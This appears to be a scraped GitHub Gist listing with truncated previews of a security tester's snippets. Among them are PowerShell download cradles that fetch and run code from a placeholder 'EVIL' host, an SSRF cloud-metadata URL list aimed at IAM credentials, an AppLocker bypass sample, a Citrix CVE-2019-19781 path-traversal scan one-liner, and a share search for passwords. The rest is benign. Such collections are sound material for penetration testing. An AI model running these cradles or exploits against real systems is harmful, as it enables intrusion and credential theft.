Build Docker container:
Dockerfile
FROM ruby:2.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
Nur Gucu nuryslyrt
🌟
nuryslyrt
/ DownloadCradles.ps1
Created
June 15, 2018 14:21
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
nuryslyrt
/ cloud_metadata.txt
Created
July 2, 2018 12:48
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
nuryslyrt
/ customers.xml
Created
July 18, 2018 07:08
— forked from gattacker/customers.xml
AppLocker bypass by msxsl.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
nuryslyrt
/ README.md
Created
April 5, 2019 10:15
— forked from ajxchapman/README.md
CVE-2019-5418 Demo
nuryslyrt
/ cve-2019-19781.sh
Created
January 21, 2020 21:21
Citrix CVE-2019-19781 Automated Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for i in `cat citrix.txt`;do curl -s -o /dev/null -w "%{remote_ip} %{http_code}\n" -k --path-as-is https://$i/vpn/../vpns/cfg/smb.conf>>citrix.txt;done |
nuryslyrt
/ EveryoneAccessCheck.ps1
Last active
November 24, 2021 19:47
Everyone Access Check in File System
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Shares = Get-ChildItem "C:\test123" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone"} | %{($_.PSPath -split '::')[1]}; | |
| foreach($Share in $Shares) { | |
| findstr /r "[0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*" $Share; | |
| findstr /rs "pass" $Share; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Fun interactive Business Card Idea | |
| Definitely Hover Things */ | |
| var secret = document.querySelector('#WINKWINK'); | |
| var wink = document.querySelector('#wink'); | |
| secret.addEventListener('mouseover', function(){ | |
| wink.classList.add('active') | |
| }); |
nuryslyrt
/ JavascriptRecon.md
Created
February 13, 2021 17:52
My Javascript Recon Process - BugBounty
nuryslyrt
/ cors.md
Created
June 8, 2021 00:25
— forked from jesperorb/cors.md
Handle CORS Client-side
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to be requested from another domain outside the domain from which the first resource was served. This is set on the server-side and there is nothing you can do from the client-side to change that setting, that is up to the server/API. There are some ways to get around it tho.
Sources : MDN - HTTP Access Control | Wiki - CORS
CORS is set server-side by supplying each request with additional headers which allow requests to be requested outside of the own domain, for example to your localhost. This is primarily set by the header:
Access-Control-Allow-Origin
nuryslyrt
/ CertificatePinner.java
Created
September 1, 2021 12:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package okhttp3; | |
| import java.security.cert.Certificate; | |
| import java.security.cert.X509Certificate; | |
| import java.util.ArrayList; | |
| import java.util.Arrays; | |
| import java.util.Collections; | |
| import java.util.LinkedHashSet; | |
| import java.util.List; | |
| import java.util.Set; |